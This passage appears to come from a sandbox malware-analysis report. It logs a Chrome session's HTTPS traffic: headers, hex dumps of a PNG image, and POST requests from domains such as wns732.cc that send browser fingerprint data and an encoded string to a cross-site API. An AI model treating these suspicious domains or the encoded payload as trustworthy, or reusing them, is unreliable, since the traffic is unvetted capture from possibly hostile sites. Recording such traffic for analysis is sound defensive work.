                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC630INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 663866
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Feb 2023 04:41:55 GMT
                                                                                                                                                          ETag: "63e32813-a213a"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[32],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,30],EU-GER-frankfurt-GLOBAL1-CACHE9[19],EU-GER-frankfurt-GLOBAL1-CACHE8[0,TCP_HIT,17],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1419431
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: f3b7e123242b5dbb240336246bdc1657
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1172569
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:08 UTC15754INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 06 08 06 00 00 00 27 b2 43 a7 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 87 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR'CtEXtSoftwareAdobe ImageReadyqe<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:4
                                                                                                                                                          2024-06-09 22:41:08 UTC16384INData Raw: 38 09 a7 f3 9c 83 af 6f 1a 43 d8 5e eb 29 29 18 57 08 87 a2 c2 12 dc 58 e4 26 10 5c 53 fc dc 21 2d 1a 25 96 3f 2f 7b 12 27 5c ca b4 57 0f f1 eb 95 26 38 35 17 0c f6 77 24 4b 5e a9 d6 39 1b 35 fa eb e2 79 e7 4f 7d a7 fb 9f 69 9d 9c c7 d1 df 78 c1 78 fd a6 a4 ea 6d d4 24 11 2b 9b c9 5f 73 f9 86 91 f2 df f7 f4 9c 72 84 83 55 58 79 a2 c0 b6 8b d6 c1 61 0b 98 e2 b3 df ab 13 57 b1 c4 20 3d 28 6e e8 c6 8f 3f 6e ce 4d 3a 7d 02 bd 7a ac 0a 7d c4 aa ad 34 ac b9 0d cc 31 1e 71 4a a1 6a d6 a3 68 d3 bb 72 5b f5 c4 4b 29 f0 3a 0a 1a 4a 2e f4 57 25 5c f0 ae 15 80 3c d7 41 47 06 bb ae 42 4d 27 f0 04 a7 e6 65 20 51 fa 01 45 7f 55 8c f3 22 f4 84 67 42 c4 62 5b 35 d8 ec 73 c7 6f 21 e9 01 a9 a2 2b e1 83 76 ef 7a d6 ea 5f 14 e7 b0 18 ce 55 5d 77 0b 02 51 5c 09 04 02 81 40 08
                                                                                                                                                          Data Ascii: 8oC^))WX&\S!-%?/{'\W&85w$K^95yO}ixxm$+_srUXyaW =(n?nM:}z}41qJjhr[K):J.W%\<AGBM'e QEU"gBb[5so!+vz_U]wQ\@
                                                                                                                                                          2024-06-09 22:41:08 UTC16384INData Raw: ca bc 3b ca ef bf b9 99 8a c3 1e 95 3d c1 80 4d 6c c0 78 bc 62 65 b2 e2 f6 f6 b7 e8 99 de de c4 fc fe 23 da ab 1c 98 76 6e 7d 7d 3d 9f cf 8d bb c9 e7 e4 2d 28 2c d1 cb ca 4a 7e ff ee 96 79 06 be e8 d5 e0 2b ce cf a6 b4 f7 56 57 47 3d 7f 22 7e 29 0a e8 26 b7 f8 ea ea 8a d6 f1 e6 c6 06 dd 0f 02 fb 64 0d e2 ad 27 27 17 6e 6b 6b c3 85 ae 4d 6a 2b b8 c2 8b 3b ea de ca 3f bb bc bc 25 c1 ff 8d 8d 35 1a 4b 1d 93 2f 3e 90 d7 3a 4f 57 23 5b 95 ff 7d 7a 76 e9 26 e3 b1 9b ac 8c e9 bb 8f 4f 4e e9 3e 8c c7 23 3e e7 fc bc ce f2 6b 36 37 37 c5 a7 86 45 90 61 ce c6 16 f7 75 3a 9d bb 93 d3 53 77 f0 61 87 a6 fd 34 40 b1 f8 4f de 9f a9 32 73 88 85 d7 95 bd c6 fb ce d7 c2 46 94 e0 2b ea f9 bb 72 9f da e4 53 cd aa 05 49 53 49 dc d5 1f d9 44 7d 96 ed 25 01 99 25 50 6c c1 d4 94
                                                                                                                                                          Data Ascii: ;=Mlxbe#vn}}=-(,J~y+VWG="~)&d''nkkMj+;?%5K/>:OW#[}zv&ON>#>k677Eau:Swa4@O2sF+rSISID}%%Pl
                                                                                                                                                          2024-06-09 22:41:08 UTC16384INData Raw: 63 25 d7 32 9d 93 d1 46 29 df 2f da 8f ba 23 67 22 a9 82 6b 5c 23 91 f5 63 02 ef 37 37 d7 e9 ba 50 f4 d8 20 06 5c 27 76 35 19 76 98 23 fd 3f b4 8c f3 ed f6 25 a6 a7 49 f0 93 49 13 b4 68 01 a4 b4 aa 13 70 7a 4b 43 c3 90 0f 46 d7 4e 69 f4 a1 c6 3f 9a 6f 94 c2 8f da 4d 89 d3 c0 66 87 56 2f 8a c6 f0 6d 44 0c 50 fd b1 a6 70 ef 8d 9e 98 5f 82 ee bc 8f c3 ba 1b c4 0f 36 1f a2 75 39 57 66 26 eb 8c a1 68 06 20 6b 7d 6d 5c 06 32 20 d8 e9 3a 63 67 4d b1 4d 8b 9b e5 39 b9 96 a9 af 9d 5e d6 07 80 4d a9 c5 3d 9d 5e aa 03 0f 8a 7e 64 ea 15 d3 e2 af 71 3f ff 78 00 2b f9 3b d0 5e d3 63 d4 d1 88 e8 48 4e 02 d5 e1 fe 24 09 1c d0 40 01 20 c4 2d 53 ab 55 3c bb 54 f5 52 13 85 7a d7 0a 00 6a 4b 06 8c b5 22 f7 c4 58 8a 5c 0d 80 d1 02 bb e9 f6 96 2b 21 40 de 61 b8 31 0d ea fb e5
                                                                                                                                                          Data Ascii: c%2F)/#g"k\#c77P \'v5v#?%IIhpzKCFNi?oMfV/mDPp_6u9Wf&h k}m\2 :cgMM9^M=^~dq?x+;^cHN$@ -SU<TRzjK"X\+!@a1
                                                                                                                                                          2024-06-09 22:41:08 UTC16384INData Raw: 12 66 f3 19 2c 42 c2 b9 aa a2 21 44 5b 60 4c 07 ac 66 7b 92 9e 91 0b 36 66 0e 8b d9 0c 66 e1 39 83 90 b0 0e c2 b5 c1 aa 5a bb 7a f7 53 00 59 8a 99 82 eb 72 f3 2e dd a1 d2 0c 16 44 0a b1 4b 5c e7 47 85 46 9f 80 4c 75 1d df eb e0 e0 80 d6 70 6a 75 56 c5 82 b6 46 9b dc 9f db db 7b ba e7 f8 05 37 39 31 ee 76 a3 ed f4 2d 21 d9 b7 6f cf e8 e7 fb fb 59 f4 0f 1d 9b 00 b5 bb bb 7b 62 b1 e0 fe a2 f7 48 da 5b b9 80 a0 5b 52 d1 66 1e 85 a4 5b 0f 2d 48 fb 0e d6 87 0c a0 2f c3 60 1a 03 62 dc e3 75 a7 06 dd d2 b3 27 05 3c 23 38 e5 ea b9 73 79 08 0a 82 3b b8 7e a6 34 b5 d9 26 06 f9 c7 8f 9f 54 11 21 fe 2c ab 5b 6c 2b fd ad 52 08 25 64 5d 2d 4c c0 30 d6 c0 7b 87 37 09 6d 1a 25 61 90 8b 61 9d e0 eb 31 71 ba 0b 3e 16 81 2e 8e 99 e1 36 9c cf 28 ac 6b f4 e5 49 fc d7 f9 35 76
                                                                                                                                                          Data Ascii: f,B!D[`Lf{6ff9ZzSYr.DK\GFLupjuVF{791v-!oY{bH[[Rf[-H/`bu'<#8sy;~4&T!,[l+R%d]-L0{7m%aa1q>.6(kI5v
                                                                                                                                                          2024-06-09 22:41:08 UTC16384INData Raw: 9b 90 b4 4f ef 37 53 d7 76 f0 c8 86 49 e1 0e 16 12 d2 89 8f 61 6a 91 ea 73 94 6a a8 5f 1b 94 61 95 e4 37 8e dd c6 bf bf 29 b5 3b 74 65 a1 65 e3 14 ce 47 22 87 a6 d5 bd 67 78 c2 0f b2 5d 8a 89 f4 26 df bb 83 83 61 9a 30 07 e4 d4 de 15 c2 a2 72 4c 0c 1e b2 33 f0 e9 ba 1b a5 9b 95 f4 8b 54 a0 92 f4 b7 2c 57 53 a1 3d d1 23 f6 8d 93 3e ca 5f b7 b4 49 ea 90 69 fc fe fb 39 03 13 4a 63 43 5f 10 ef d7 82 a1 7e bf a6 35 8a 8c bc c3 f0 b9 d0 60 e0 f7 08 8e f4 ba 22 86 6e 69 44 2e b6 64 8c 0e 3b 0c b0 d4 f0 5f ff db 3f c0 6d 99 20 ea 96 49 f9 19 1d d0 c5 c5 98 d6 25 3a e1 ba 2e c5 ce 75 bc 8e 55 33 bc ce 8d 53 ba 43 ae c5 42 2a 92 f4 f8 3c ac b4 a5 fb 13 be de 0d de 16 ac 30 6a 37 39 ca f7 93 92 9a f0 5e 38 f2 dd 6c d2 66 f6 25 ab 4c 5e a3 2b 91 d8 92 d9 a3 c4 3f 4e
                                                                                                                                                          Data Ascii: O7SvIajsj_a7);teeG"gx]&a0rL3T,WS=#>_Ii9JcC_~5`"niD.d;_?m I%:.uU3SCB*<0j79^8lf%L^+?N
                                                                                                                                                          2024-06-09 22:41:08 UTC16384INData Raw: 8b 28 95 35 96 a8 5e f2 ad 69 31 77 13 8e 93 93 63 ba 99 4c 78 61 df 1f f4 f8 77 83 e1 90 6e c6 d7 ec d7 e3 cc d8 dc 64 0c 7d d0 d2 3e ef e2 f2 92 63 8d 75 28 87 e3 cf dc 67 e2 02 be 54 bb 7b 43 d7 98 fd 2e 66 e8 c0 40 82 c1 a4 d6 c4 d4 27 a4 2c cd d8 e7 c3 11 72 45 8c 0d 07 91 85 d7 03 b9 c5 93 77 a8 71 e6 1d 26 43 ce cf 2f ed ef 07 f6 33 ba 44 43 10 25 d8 a5 5e 35 a3 d7 b4 e7 3d 44 f6 f6 46 7c 3c 28 7f c4 a2 33 4a 1e 7d 07 f0 9a 16 78 4d 35 a2 da 72 fe d2 f2 86 32 cd 78 7a 28 ab 46 3b 8e cc e9 79 0f 1f b4 a5 34 a9 32 4c 20 06 3f 33 9d a9 1c e6 3e 9e 67 3a 5b f0 f5 fb e1 87 63 ba ba 76 66 ff 68 9f 78 3c da 3d 08 ca 6e af 1b eb 2b 6a 93 8c d6 cf cf ce 98 68 cc 77 b8 40 5e a2 34 15 0a 41 a4 0a 86 94 9c fc b3 3a b2 0d 49 86 65 9c 0c e1 7e db dd db 8f 9d 3c
                                                                                                                                                          Data Ascii: (5^i1wcLxawnd}>cu(gT{C.f@',rEwq&C/3DC%^5=DF|<(3J}xM5r2xz(F;y42L ?3>g:[cvfhx<=n+jhw@^4A:Ie~<
                                                                                                                                                          2024-06-09 22:41:08 UTC16384INData Raw: 61 c3 df b1 8e bc c8 b9 3d 93 e9 94 30 0c 60 0b 8f c1 3a 00 9a 90 b1 05 9d 9d 9e 12 88 01 4e dd 3f 3c f0 fe 1d 83 e4 4b 3a b3 b0 5e 38 ac 58 fe 68 96 99 cd 67 1c 11 40 31 80 36 80 2f 08 65 8c 17 97 17 92 98 df 37 e6 35 a1 03 22 b6 05 db 17 39 07 97 4a a5 52 a9 54 5f b2 14 60 a9 54 2a 95 4a a5 52 7d e1 ca b6 1b 79 fd ea 95 6c d6 6b 19 0f 86 16 5a 04 22 bd 56 4b 76 e6 be 30 89 59 b2 86 5c a5 c9 64 2a c7 e3 1e 9d 58 db ed 4e aa ba 94 24 b5 8e 22 40 8c 12 e0 26 08 a4 aa 0a c9 f3 42 3a ad b6 59 46 64 7e ff 5e 86 67 cf 25 ed 7c c1 fd e8 0e 80 95 35 0d 55 ee e7 fa c3 c5 0e 20 15 80 0f 03 d5 e1 5c cb 73 de 8e db 00 f6 72 f3 05 50 04 10 c5 bc b0 30 a4 cb 09 8e 27 38 98 7a db 9e 19 df 1d 41 10 5c 4c 00 45 91 59 f7 d1 d1 d8 76 0d 3c 3b e7 fa b0 7e 64 55 f9 b2 43 c0
                                                                                                                                                          Data Ascii: a=0`:N?<K:^8Xhg@16/e75"9JRT_`T*JR}ylkZ"VKv0Y\d*XN$"@&B:YFd~^g%|5U \srP0'8zA\LEYv<;~dUC
                                                                                                                                                          2024-06-09 22:41:08 UTC16384INData Raw: 2a 88 23 33 d6 01 cb 22 3d 1c aa dd 0b b5 e3 60 33 a2 ca a2 24 64 c3 6b c7 e4 16 eb 03 dc 40 a6 d7 d9 99 99 e8 76 7b 2c 35 f9 54 13 6b ec 93 28 b2 9d ef 6c a9 9f dd a6 50 3e 30 5c 1d 3c a4 de b7 1b 6c 26 7e fb bc 2b bf 2f 70 fc e4 3e 1f 2b 0c 1a 17 11 81 4e 5d 30 ed 0c 41 c6 28 83 79 2a b3 30 ec 27 c0 cb a1 99 b0 d2 69 c8 40 e7 ba 71 5e ed 97 b3 2e 42 1f 9c 8f 43 b6 0a ec 79 82 ce 9f 7e 5d a1 83 5a 0a b0 be 5e ad 97 0b 59 af 56 04 17 70 e7 b5 db 2d 42 c9 8e b9 16 21 c7 08 d7 bd d7 7f f9 b3 7c ff c3 0f 3c 66 26 0f 0f 5c 0e 40 63 bb db f1 18 78 76 71 21 ed 4e 97 e0 42 f5 59 09 96 fb a0 26 b4 ae 5d 3a 90 13 7e 20 f3 6b 00 0b 6e 29 5c 3f 09 a3 b1 8c 39 5f e1 2e c5 29 9b c4 36 df 6e bb db 4a 52 a5 bc 26 e2 43 1c 5c 0f 50 5a 08 50 dd ea b4 25 36 3f 97 2e e4 71
                                                                                                                                                          Data Ascii: *#3"=`3$dk@v{,5Tk(lP>0\<l&~+/p>+N]0A(y*0'i@q^.BCy~]Z^YVp-B!|<f&\@cxvq!NBY&]:~ kn)\?9_.)6nJR&C\PZP%6?.q
                                                                                                                                                          2024-06-09 22:41:08 UTC16384INData Raw: 3a 25 fb 2a 23 10 15 cb 66 bd 6d 59 5a 35 7d 96 52 4a 5e c8 50 72 4d 13 99 50 e6 81 44 83 f0 24 a5 77 14 8a 3e 3e 9b 2d 1b c0 e1 68 24 5f 7f f9 05 19 04 60 20 55 47 d7 58 e4 2a e7 a1 a7 15 1a bb 3c a7 e7 cb 7e b3 91 89 6b 0e bd 71 b8 67 ed f0 aa 3a 1a 49 f7 b8 71 f6 eb 9a b5 24 cd 09 50 2c 97 4b 99 2f 16 04 0c c0 b2 e8 f5 14 b0 02 88 b5 73 4d e8 7c b1 72 af 39 26 98 30 b9 be d6 44 42 f3 e6 02 78 54 d7 a5 a6 8e 01 5c ab 4e 72 38 09 4d 80 27 a3 81 1c 5c b3 0b 40 03 00 1c 64 63 90 21 41 96 d4 ed 00 5c bc 53 2f 2d 36 49 07 32 d8 9a c6 3c 5b cc 43 ca 4b 3d 31 e6 48 18 c4 f8 20 31 0d 8f a7 e0 97 fa 27 e1 f9 ec 5c b3 36 bd fd c7 cc 80 24 ef b6 46 f1 9a 2a a8 12 9b cc 7c c7 f8 f8 17 66 eb 9e ed e1 d7 0b c1 4d f3 b9 ba 94 98 46 ed 3c 29 e0 a5 98 68 63 3f 8b f5 f7
                                                                                                                                                          Data Ascii: :%*#fmYZ5}RJ^PrMPD$w>>-h$_` UGX*<~kqg:Iq$P,K/sM|r9&0DBxT\Nr8M'\@dc!A\S/-6I2<[CK=1H 1'\6$F*|fMF<)hc?


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          302192.168.2.550052103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:08 UTC669OUTPOST /mt-cloud/api/sn.maintain.list HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 304
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://wns732.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC304OUTData Raw: 6a 73 6f 6e 3d 25 37 42 25 32 32 69 64 25 32 32 25 33 41 25 32 32 31 37 39 37 32 38 36 35 33 38 38 32 39 36 25 32 32 25 32 43 25 32 32 6a 73 6f 6e 72 70 63 25 32 32 25 33 41 25 32 32 32 2e 30 25 32 32 25 32 43 25 32 32 6d 65 74 68 6f 64 25 32 32 25 33 41 25 32 32 73 6e 2e 6d 61 69 6e 74 61 69 6e 2e 6c 69 73 74 25 32 32 25 32 43 25 32 32 70 61 72 61 6d 73 25 32 32 25 33 41 25 37 42 25 32 32 73 6e 25 32 32 25 33 41 25 32 32 75 79 30 39 25 32 32 25 32 43 25 32 32 74 65 72 6d 69 6e 61 6c 25 32 32 25 33 41 31 25 32 43 25 32 32 68 6f 73 74 25 32 32 25 33 41 25 32 32 77 6e 73 37 33 32 2e 63 63 25 32 32 25 32 43 25 32 32 66 69 6e 67 65 72 4f 53 4d 6f 64 65 6c 25 32 32 25 33 41 25 32 32 43 68 72 6f 6d 65 25 32 30 31 31 37 2e 30 2e 30 2e 30 25 32 30 25 37 43 25 32
                                                                                                                                                          Data Ascii: json=%7B%22id%22%3A%2217972865388296%22%2C%22jsonrpc%22%3A%222.0%22%2C%22method%22%3A%22sn.maintain.list%22%2C%22params%22%3A%7B%22sn%22%3A%22uy09%22%2C%22terminal%22%3A1%2C%22host%22%3A%22wns732.cc%22%2C%22fingerOSModel%22%3A%22Chrome%20117.0.0.0%20%7C%2
                                                                                                                                                          2024-06-09 22:41:08 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:08 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:08 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 30 38 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          2024-06-09 22:41:08 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:08 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:08 UTC32INData Raw: 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: access-control-allow-origin: *
                                                                                                                                                          2024-06-09 22:41:08 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:08 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:41:08 UTC82INData Raw: 78 2d 76 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: x-via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:08 UTC17INData Raw: 76 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a
                                                                                                                                                          Data Ascii: via: 1.1 google


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          303192.168.2.550053103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:08 UTC663OUTPOST /zb-cloud/pwv/agent.code HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 488
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://wns732.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC488OUTData Raw: 6a 73 6f 6e 3d 70 77 76 7c 31 33 7c 4b 46 62 51 5a 4d 43 62 73 4d 4d 78 57 65 49 75 47 30 47 6b 46 74 47 6b 47 76 68 33 52 6e 66 32 51 44 4d 34 4d 52 69 30 4f 79 56 6c 59 76 56 6b 4f 6d 4b 72 47 70 68 70 78 32 35 6b 6d 42 4d 75 47 6c 48 65 57 30 43 79 46 66 46 64 50 69 44 76 4d 68 47 6a 4e 61 4e 79 59 77 4b 66 58 4c 48 68 76 32 54 64 43 66 55 76 48 30 45 75 47 6c 49 61 4a 32 54 68 77 59 35 67 67 32 56 6b 4d 44 49 77 48 52 4b 54 4b 47 55 6c 64 53 44 6d 4f 50 31 74 4d 4c 59 75 56 44 49 42 53 4e 66 42 43 44 47 6c 53 43 39 71 44 41 6b 78 54 54 47 77 48 55 44 43 57 46 56 7a 70 32 35 78 42 70 46 73 4f 65 44 66 56 44 44 79 53 4e 4c 43 43 44 47 6c 76 32 34 68 4a 6f 4d 6b 50 30 4f 6c 4b 68 48 31 66 4a 42 35 57 46 56 7a 56 52 58 54 43 4e 4c 71 74 43 48 69 77 57 75
                                                                                                                                                          Data Ascii: json=pwv|13|KFbQZMCbsMMxWeIuG0GkFtGkGvh3Rnf2QDM4MRi0OyVlYvVkOmKrGphpx25kmBMuGlHeW0CyFfFdPiDvMhGjNaNyYwKfXLHhv2TdCfUvH0EuGlIaJ2ThwY5gg2VkMDIwHRKTKGUldSDmOP1tMLYuVDIBSNfBCDGlSC9qDAkxTTGwHUDCWFVzp25xBpFsOeDfVDDySNLCCDGlv24hJoMkP0OlKhH1fJB5WFVzVRXTCNLqtCHiwWu
                                                                                                                                                          2024-06-09 22:41:08 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:08 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:08 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 30 38 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          2024-06-09 22:41:08 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:08 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:08 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:08 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 33 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 3
                                                                                                                                                          2024-06-09 22:41:08 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:08 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:41:08 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          304192.168.2.550067199.91.74.2134434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:08 UTC554OUTGET /cc.png?r=5735666541 HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://yh8613.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://yh8613.cc/
